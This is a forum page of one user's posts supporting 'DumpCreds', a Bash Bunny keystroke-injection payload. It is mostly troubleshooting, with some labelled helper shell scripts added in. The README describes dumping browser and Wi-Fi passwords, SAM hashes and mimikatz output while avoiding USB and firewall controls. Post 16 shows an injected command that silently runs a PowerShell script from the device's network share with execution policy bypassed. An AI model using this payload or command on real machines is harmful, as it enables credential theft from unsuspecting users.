qdba

Everything posted by qdba

  1. Hello, at the moment I'm writing an extension which gives some debug information during a payload run. The function START_DEBUG "tail"s the /var/log/syslog to /tmp/log.txt (I won't create an extra file because syslog gives a lot more useful information in the background). During the payload run I can output some information to syslog with logger. With STOP_DEBUG I stop the "tail" and test if the /dev/nandf is mounted. If so I copy /tmp/log.txt to /root/disk/loot. If not I mount the /dev/nandf to /root/udisk, copy the file, do a sync and unmount the /dev/nandf. Now the problem. It happens often that when I look in the loot folder there is no log file and the FS is corrupted. This happens even if I do a sync; sleep 1; sync after copying the file and before unmounting the FS. It seems that the FS is not unmounted correctly. Sometimes the dirty bit is set. Has anybody any idea? Attachments: payload.txt, debug.sh
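An added example, not qdba's debug.sh or payload.txt: the mount check from the post done against the kernel mount table rather than by assumption, and a copy / sync / umount wrapper that reports a failed umount instead of returning success. The mount table path is a parameter so the check can run against a constructed file; the device and mount point names are taken from the post.

```shell
# Print the mount point of DEVICE if it appears in MOUNTS_FILE (default /proc/mounts).
# Exit status 0 when mounted, 1 when not, so it can drive an if.
mount_point_of() {
    dev="$1"
    mounts="${2:-/proc/mounts}"
    awk -v dev="$dev" '$1 == dev { print $2; found = 1 } END { exit !found }' "$mounts"
}

# Copy FILE into SUBDIR on DEVICE. If the device is not mounted yet, mount it on
# FALLBACK_MP and unmount it afterwards; if it was already mounted, leave it mounted.
# Returns 0 only when the copy succeeded and, if we mounted the device ourselves,
# the kernel confirms it is unmounted again.
save_to_device() {
    dev="$1"; file="$2"; subdir="$3"; fallback_mp="${4:-/root/udisk}"
    if mp=$(mount_point_of "$dev"); then
        mounted_by_us=0
    else
        mkdir -p "$fallback_mp" || return 1
        mount "$dev" "$fallback_mp" || return 1
        mp="$fallback_mp"
        mounted_by_us=1
    fi
    mkdir -p "$mp/$subdir" && cp "$file" "$mp/$subdir/" || return 1
    # Flush dirty pages to the flash before trying to unmount.
    sync
    if [ "$mounted_by_us" -eq 1 ]; then
        # If umount fails (typically because a process still holds a file or directory
        # open under the mount point) the filesystem stays mounted with its dirty bit
        # set; report that instead of pretending the loot was saved.
        umount "$dev" || return 1
        mount_point_of "$dev" >/dev/null && return 1
    fi
    return 0
}

# Constructed sample of /proc/mounts for a stand-alone run (not captured from a Bunny).
SAMPLE_MOUNTS=$(mktemp)
printf '%s\n' \
    'rootfs / rootfs rw 0 0' \
    '/dev/nandf /root/udisk vfat rw,relatime 0 0' \
    'tmpfs /tmp tmpfs rw 0 0' > "$SAMPLE_MOUNTS"

mount_point_of /dev/nandf "$SAMPLE_MOUNTS"                      # prints /root/udisk
mount_point_of /dev/nande "$SAMPLE_MOUNTS" || echo "/dev/nande is not mounted"
```

In a STOP_DEBUG function the call would be `save_to_device /dev/nandf /tmp/log.txt loot || LED R` (or whatever error signal the payload uses), so a failed unmount becomes visible during the run rather than as a dirty FAT afterwards.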
  2. Hi Sebkinne, nice, can't wait for 1.2. I think the idea with a payload timeout is not so bad. With a special LED state we know if it makes sense to wait for a payload to finish or not.
  3. Plz. can you go to DEBUG mode (create a file named DEBUG in the payload folder) and look at the file /loot/DumpCred_2.1/log.txt. If there is no log.txt take a look at /tmp/log.txt. If there is something like bunny.service timeout or bunny.service failed you probably ran into a timeout. This is a Bunny issue in Firmware 1.1 and will be solved in FW 1.2. Look there .....
  4. Hi, copy all the *.json files to the language folder of the bunny flash storage. After that boot into arming mode. During boot all language files will be copied to an internal folder. I think it was /usr/local/lib/language. (At the moment I have no bunny to look at)
  5. You are right. It's to get rid of team storage mode. I don't know any company who allows USB storage. The sun ports are almost blocked. So I store the loot to the payload folder and copy it during cleanup to the /loot folder.
  6. qdba

    deb files?

    For Responder you don't need any deb files. Copy the Responder folder from the Tools_Installer payload to <flash_root>\tools and reboot the bunny in arming mode. During reboot the bunny moves the files to /tools ( <root_of_bunny_linux>/tools, previously known as /pentest ). You only need a deb file if you have some post- or preinstall scripts running after or before copying the files.
  7. DumpCreds_2.1 New Version

     Changelog
     * Complete new payload.txt code for BashBunny 1.1
     * Added a lot of debug code into the payload. For debugging create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
     * Impacket.deb included for easy impacket installation
     * Some Ducky languages included (from DuckyInstall Payload)
  8. DumpCreds 2.1

     Author: QDBA
     Version: Version 2.1.0 Build 1004
     Target: Windows 10

     Description

     ** !!!!! works only at Bash Bunny with FW 1.1 !!!!! **

     Dumps the usernames & plaintext passwords from
     * Browsers (Chrome, IE, FireFox)
     * Wifi
     * SAM Hashes (only if AdminMode=True)
     * Mimimk@tz Dump (only if AdminMode=True)
     * Computerinformation (Hardware Info, Windows ProductKey, Hotfixes, Software, Local, AD Userlist)

     without
     * Use of USB Storage (because USB Storage is mostly blocked by USBGuard or DriveLock)
     * Internet connection (because Firewall ContentFilter blocks the download sites)

     Problems

     If you first use the payload on a computer, it will take some time and tries until the drivers are successfully loaded. If the payload doesn't work (Red LED or Yellow LED blinks 2 or 4 times) plug off the BB and try it once more (can take 3 or 4 times).

     If the payload stops working (yellow LED blinks very fast longer than 2min, you get no white LED) you ran into a timeout. If you plug in the BB every payload has 1min 30s for doing the job. At 1min 30s every payload stops. (That's a FW 1.1 issue)

     Debug

     If you want some debug information, create a file with name "DEBUG" in the payload folder. You get the debug information in \loot\DumpCred_2.1\log.txt

     Folder Configuration

     None needed.

     Requirements

     impacket - install it from https://github.com/qdba/MyBashBunny/tree/master/tools

     Download

     https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/credentials/DumpCreds

     Install

     Put Bash Bunny in arming mode. Copy all folders into the root of the Bunny Flash Drive.

     Mandatory
     * payloads/library/DumpCreds_2.1 --> the payload files
     * payloads/library/DumpCreds_2.1/PS --> the Powershell scripts for the payload
     * tools --> impacket tools (provide the smbserver.py) (not necessary if you had already installed it)

     Not necessary
     * docs --> this doc file
     * languages --> language files for DUCKY_LANG

     Eject Bash Bunny safely!!
     Insert Bash Bunny in arming mode (Impacket and languages will be installed).
     Put all files and folders of the payload from /payloads/library/DumpCreds_2.1 to payloads/switch1 or payloads/switch2.
     Eject Bash Bunny safely.
     Move switch in right position.
     Plug in Bash Bunny and have fun....! :-)

     STATUS LED

     LED                     Status
     Magenta solid           Setup
     Red slow blink          Impacket not found
     Red fast blink          Target did not acquire IP address
     Yellow single blink     Initialization
     Yellow double blink     HID Stage
     Yellow triple blink     Wait for IP coming up
     Yellow quad blink       Wait for Handshake (SMBServer coming up)
     Yellow very fast blink  Powershell scripts running
     White fast blink        Cleanup, copy files to /loot
     Green                   Finished

     Discussion
     https://forums.hak5.org/index.php?/topic/40582-payload-drumpcreds-20-wo-internet-wo-usb-storage

     Credits to......
     https://github.com/EmpireProject/Empire
     Get-FoxDump.ps1, Invoke-M1m1k@tz.ps1, Invoke-PowerDump.ps1, Get-ChromeCreds.ps1

     Changelog
     * Complete new payload.txt code for BashBunny 1.1
     * Added a lot of debug code into the payload. For debugging create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
     * Impacket.deb included for easy impacket installation
     * Some Ducky languages included (from DuckyInstall Payload)
  9. Can be a runtime problem. With default settings a payload does not run longer than 1min 30s (measured since plugging in the bunny). After 1min 30 every payload stops working. Check your /var/log/syslog if there is an entry like:

     bunny.service start operation timed out. Terminating
     Failed to start bunny.service
  10. I'm still running into the payload timeout after 1 minute. So I did some investigation about it. I made the attached payload.txt for testing. I put the command logger "#### Start Test payload ####" at the beginning of the payload and logger "#### End Test payload ####" at the end. So I can examine the syslog for what happens during the payload run. After approx. 1:30 min bunny.service is running into a timeout:

     .........
     Apr 6 09:56:52 bunny logger: #### Loop Test payload ####
     Apr 6 09:56:54 bunny logger: #### Loop Test payload ####
     Apr 6 09:56:56 bunny logger: #### Loop Test payload ####
     Apr 6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
     Apr 6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
     Apr 6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
     Apr 6 09:56:58 bunny systemd[1]: Starting Multi-User System.
     Apr 6 09:56:58 bunny systemd[1]: Reached target Multi-User System.
     Apr 6 09:56:59 bunny systemd[1]: Startup finished in 2.366s (kernel) + 1min 34.343s (userspace) = 1min 36.710s.

     The result of the command systemctl show bunny.service |grep Timeout is

     TimeoutStartUSec=1min 30s
     TimeoutStopUSec=1min 30s
     JobTimeoutUSec=0

     Guess this is the reason for the payload timeout. Can anybody confirm this? I will do more investigations. Attachments: syslog, payload.txt
     ______________________________________________________________________________________________________________________
     OK got it..... I inserted the value TimeoutSec=5min under the [Service] section of the file /lib/systemd/system/bunny.service. Now it works with a timeout of 5 min. (see attached syslog.solved_5min_Timeout) Be careful, I'm not responsible for any damage to the bunny :-) @Darren Kitchen @Sebkinne If you agree (because it's part of the Firmware) I can make a payload which will patch this. Attachment: syslog.solved_5min_Timeout
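An added example for posts 9 and 10, not qdba's payload or any Hak5 file: (1) the syslog check the posts describe doing by eye, as a function that picks out systemd's start-timeout messages and names the unit; (2) the same TimeoutSec change written as a drop-in under /etc/systemd/system/bunny.service.d/ instead of an edit to /lib/systemd/system/bunny.service, so a firmware update that replaces the unit file does not silently undo it. The syslog sample is constructed from the lines quoted above; the root-directory argument exists only so the drop-in can be written into a temporary tree for a dry run.

```shell
# Print "<month> <day> <time> <unit>" for each start-timeout message in LOGFILE.
# Exit 0 if at least one was found, 1 otherwise, so it can drive an if.
# Syslog fields: $1 month, $2 day, $3 time, $4 host, $5 "systemd[1]:", $6 unit name.
find_start_timeouts() {
    awk '/systemd\[[0-9]+\]: [^ ]+ start operation timed out/ { print $1, $2, $3, $6; n++ }
         END { exit !n }' "$1"
}

# Write ROOT/etc/systemd/system/UNIT.d/10-start-timeout.conf raising only the start
# timeout (TimeoutStartSec); the stop timeout keeps its default. ROOT is empty on the
# real system and a temporary directory for a dry run.
write_start_timeout_dropin() {
    unit="$1"; timeout="$2"; root="${3:-}"
    dir="$root/etc/systemd/system/$unit.d"
    mkdir -p "$dir" || return 1
    cat > "$dir/10-start-timeout.conf" <<EOF
# Payloads longer than the 1min 30s default were killed at start; see /var/log/syslog.
[Service]
TimeoutStartSec=$timeout
EOF
}

# Constructed syslog excerpt (modelled on the lines quoted in the post, not a capture).
SAMPLE_SYSLOG=$(mktemp)
cat > "$SAMPLE_SYSLOG" <<'EOF'
Apr  6 09:56:56 bunny logger: #### Loop Test payload ####
Apr  6 09:56:58 bunny systemd[1]: bunny.service start operation timed out. Terminating.
Apr  6 09:56:58 bunny systemd[1]: Failed to start bunny.service.
Apr  6 09:56:58 bunny systemd[1]: Unit bunny.service entered failed state.
EOF

if find_start_timeouts "$SAMPLE_SYSLOG"; then
    echo "payload was killed by the unit start timeout"
fi

# Dry run into a temporary tree. On the Bunny itself call it as root with an empty
# third argument and follow with: systemctl daemon-reload
DRYRUN_ROOT=$(mktemp -d)
write_start_timeout_dropin bunny.service 5min "$DRYRUN_ROOT"
cat "$DRYRUN_ROOT/etc/systemd/system/bunny.service.d/10-start-timeout.conf"
```

After `systemctl daemon-reload`, `systemctl show bunny.service -p TimeoutStartUSec` should report the new value, which is the same check the post ran with grep.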
  11. There is an Error ( or is it a Feature ). There is a timeout approx. 1 min; after this timeout the payload stops. Run the attached payload and look at /log.txt. The payload stops after a minute. Attachment: payload.txt ------------------------------------[Solved] ------------------------------------------------ Look there --- Look here :-)
  12. Impacket Tools impacket_0.9.15_1.deb https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/tools Put the deb file into <root>\tools folder - remove Bunny safely - reinsert in arming mode. It will be installed to /tools/impacket.
  13. Searching for Language Files? Here they are. Exported from DuckInstall https://github.com/qdba/bashbunny-payloads/tree/version_2.1/payloads/library/DumpCreds_2.1/languages Put them into the <root>\Language folder - remove Bunny safely - reinsert in arming mode
  14. Very nice!! Now let us rewrite some payloads ;-)
  15. OK, helps a lot. So the handshake thing works fine. Now the error message would be helpful. On very fast vanishing error messages I do a trick: I make a video with the smartphone and forward slowly, manually, until the error message is seen.
  16. Are you using Version 2.0.2? Is there a UAC prompt or a credential prompt? Guess there is a timing problem, so the main.ps1 script will not start.

     LED R G
     # Wait for Bunny Ethernet and Start main.ps1 Powershell Script
     Q DELAY 500                 <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
     Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
     Q DELAY 1000
     Q ENTER

     Does the main.ps1 script fire up right? Can you see the command in the console? Take care that no other window is open on the screen. Works best on a pure desktop.
  17. Can you connect to \\172.16.64.1\e from explorer? Is the smbserver.py running (ssh to Bunny and do a ps -ef |grep smb)? If not, see my post above; there is an error in the Impacket installed by tools_installer.
  18. After a Firmware reset this afternoon, I ran into trouble with smbserver.py. It didn't start. The purple LED blinks slowly. After some tests I realized that after the run of the tools_installer the things were installed fine, but smbserver.py had ^M at the end of every line. I removed it in vi with

     :1,$s/<CTRL-v><CTRL-M>//g

     or with the commands

     cd /pentest/impacket/examples
     cp smbserver.py smbserver.py.sik
     cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py

     Now it works again.
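An added example, not qdba's commands: detect CR line endings in a script, strip them in place without losing the file's permissions, and show what the shebang line actually names. A first line of `#!/usr/bin/python` followed by a CR makes the kernel look for an interpreter literally called "python\r", so a CRLF-converted script fails to start even though its contents look correct in an editor. The sample file below is constructed, not the real smbserver.py, and the *.py sweep is a generalisation of the single-file fix in the post.

```shell
# Exit 0 if FILE contains at least one CR byte, 1 otherwise.
has_crlf() {
    grep -q "$(printf '\r')" "$1"
}

# Remove every CR from FILE. The result goes to a temp file first and is then copied
# back into the original (cat > file keeps the inode, mode and owner), so a failure
# midway never leaves the script truncated.
strip_crlf() {
    file="$1"
    tmp="$file.tmp.$$"
    tr -d '\r' < "$file" > "$tmp" || { rm -f "$tmp"; return 1; }
    cat "$tmp" > "$file" && rm -f "$tmp"
}

# Print the interpreter path named on the first line of FILE (empty if no shebang).
# With CRLF endings the output carries a trailing CR: that is the "bad interpreter".
shebang_interpreter() {
    head -n 1 "$1" | sed -n 's/^#!\([^ ]*\).*/\1/p'
}

# Strip CR from every *.py under DIR that has it and print the files that were changed.
fix_crlf_tree() {
    find "$1" -type f -name '*.py' | while IFS= read -r f; do
        if has_crlf "$f"; then
            strip_crlf "$f" && printf 'fixed %s\n' "$f"
        fi
    done
}

# Constructed sample: a tiny script written with CRLF endings, as a copy edited on
# Windows would be.
SAMPLE=$(mktemp)
printf '#!/usr/bin/python\r\nimport sys\r\nprint("hello")\r\n' > "$SAMPLE"

has_crlf "$SAMPLE" && echo "CRLF detected"
shebang_interpreter "$SAMPLE" | od -c      # shows the trailing \r after "python"
strip_crlf "$SAMPLE"
shebang_interpreter "$SAMPLE"              # /usr/bin/python
```

`tr -d '\r'` is used instead of `sed 's/\r$//'` because `\r` in a sed expression is a GNU extension, while `tr` behaves the same on every sh the Bunny or a laptop is likely to have.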
  19. If you set the IP manually, the var TARGET_IP will not be set by the bunny_helpers.sh script. So the check if there is a target IP fails and it blinks red. I'm working on an extended version of bunny_helpers.sh. It's not an error of the payload. If the LED blinks slow purple the payload is waiting for smbserver and the handshake. Is a direct connection with explorer to \\172.16.64.1\e working? If yes... does it work when you start the script main.ps1 manually (enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell)? Be sure you have the latest files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.
  20. In Version 2.0.2 it works. In older versions they are truncated.
  21. Thank you for the information. But it didn't work for me, because I start every process in its own powershell environment with start-job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)
  22. New Version 2.0.2

     Changelog:
     * Parallelize Powersploit scripts, so the payload is faster.
     * Universal payload. The payload works no matter if there is a UAC prompt or a credentials prompt. There is no kind of exploitation. You will not get admin rights if you didn't have them before. But without admin rights WifiDump, BrowserDump and Computerinformation work fine. Only for Hashdump and M1m1k@tz you need admin rights.

     Install: Copy all files to your switch directory. Don't forget the PS folder.
     Download: See first post
  23. New Version 2.0.1 Added: Gather Computerinformation (Hardware, Software, Hotfixes, OS Information, OS ProductKey, Userlist...) https://github.com/qdba/bashbunny-payloads/tree/master/payloads/library/DumpCreds_2.0
  24. Yes, that's the original call of the smbserver command. The "nohup python /pentest/impacket/......." was only for debugging in your case. There are some timing problems in an older payload. I fixed it in a later version. Guess you have an old one, sorry about it. But anyway, fine that you like the payload.